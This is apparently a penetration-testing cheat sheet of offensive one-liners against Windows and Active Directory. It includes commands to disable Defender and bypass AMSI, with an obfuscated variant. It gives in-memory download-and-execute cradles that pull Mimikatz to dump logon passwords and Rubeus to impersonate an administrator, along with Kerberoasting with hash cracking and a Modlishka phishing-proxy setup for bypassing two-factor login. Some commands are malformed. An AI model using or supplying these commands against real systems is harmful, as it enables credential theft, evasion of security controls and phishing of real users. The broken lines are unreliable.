General

Oneliners

Disable Defender

Set-MpPreference -DisableRealtimeMonitoring $true

Powershell AMSI Bypass

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

Recon

Host Scan

# NetDiscover (ARP Scanning):
- netdiscover -i eth0
- netdiscover -r 172.21.10.0/24

# Nmap:

- nmap -sn 172.21.10.0/24
- nmap -sn 172.21.10.1-253
- nmap -sn 172.21.10.*

# Nbtscan: 
- nbtscan -r 172.21.1.0/24

# Linux Ping Sweep (Bash)

- for i in {1..254} ;do (ping -c 1 172.21.10.$i | grep "bytes from" &) ;done

# Windows Ping Sweep (Run on Windows System)

- for /L %i in (1,1,255) do @ping -n 1 -w 200 172.21.10.%i > nul && echo 192.168.1.%i is up.

BloodHound

Download it from here

# /usr/lib/bloodhound/resources/app/Collectors/
# From Local Windows host
run as /netonly /user:domain\user cmd 
powershell -ep bypass 
. .\SharpHound.ps1
invoke-bloodhound -CollectionMethod all 

Enumeration

Null Session

Initial Access

Kerberoasting

SPN Service Account

# Get all SPN accounts
GetUserSPNs.py domain/user:'password' -request
# Crack the ticket
hashcat -a 0 -m 13100 hash

Privilege Escalation

Lateral Movement

Defense Evasion

Bypass AMSI

• Get any AMSI bypass method from the following link

  [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
  

• In Windows, run PowerShell ISE and install steroids. Link: https://powershell.one/isesteroids/quickstart/install-manually

Install it manually by downloading the compressed ZIP file.

• After installing steroids tool, open PowerShell ISE and run the following command:

start-steroids

• Create a new PS script and paste the AMSI bypass link.
• In tools menu, choose obfuscate code and run the obfuscator.
• Example of the generated obfuscated script:

[Ref].Assembly.GetType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzAA==')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwA=')))).SetValue($null,$true)

• Save the generated script into the local machine. Example as amsi.txt.
• In the target host, download the AMSI bypass script and load it in the memory.

(New-Object System.Net.WebClient).DownloadString('http://ip/amsi.txt') | iex

• At the same time, any PowerShell script can be downloaded and executed in the memory.

  Examples:

  • Mimikatz

  (New-Object System.Net.WebClient).DownloadString('http://ip/Invoke-Mimikatz.ps1') | iex
  Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"' 
  

  • BloodHound

  (New-Object System.Net.WebClient).DownloadString('http://ip/Invoke-Sharphound.ps1') | iex
  Invoke-BloodHound -CollectionMethod all 
  

  • Rubeus

  (new-object system.net.web.client).downloadstring('http://ip/amsi.txt') | IEX
  $data = (new-object system.net.web.client).downloadstring('http://ip/rubeus.exe')
  $assem = [System.Reflection.Assembly]::Load($data)
  [Rubeus.Program::Main("purge").Split())
  [Rubeus.Program::Main("s4u /user:web$ /rc4:c54444 /impersonateuser:administrator /msdsspn:cifs/file01 /ptt").Split())
  

Red Team

Phishing

# Sending mails through Linux 
swaks -to "$mail" -from "user@security.com" -body "example" -header "Subject: example" -server ip

Bypass 2FA

Modliska revere http proxy for phishing Link
Add A record with content your domain
Generate SSL Certificate

openssl genrsa -out evil.com.key 4096
openssl req -new -key evil.com.key -out evil.com.csr -utf8 -batch -subj '/CN=evil.com/

Download modlishka and create a config file, import a key, pem file using awk '{printf "%s\\n", $0}' ../evil.key

{
  "proxyDomain": "evil.com",
  "listeningAddress": "ip",

  "target": "a.evil.com",
  "targetResources": "",
  "targetRules": "",
  "terminateTriggers": "",
  "terminateRedirectUrl": "",
  "trackingCookie": "id",
  "trackingParam": "id",
  "jsRules":"",
  "forceHTTPS": false,
  "forceHTTP": false,
  "dynamicMode": false,
  "debug": true,
  "logPostOnly": false,
  "disableSecurity": true,
  "log": "requests.log",
  "plugins": "all",
  "cert": "-----BEGIN CERTIFICATE-----\n<snip>\n-----END CERTIFICATE-----\n",
  "certKey": "-----BEGIN RSA PRIVATE\n<snip-----END RSA PRIVATE KEY-----\n",
  "certPool": ""
}

Run modlishka

./Modlishka -config modlishka.json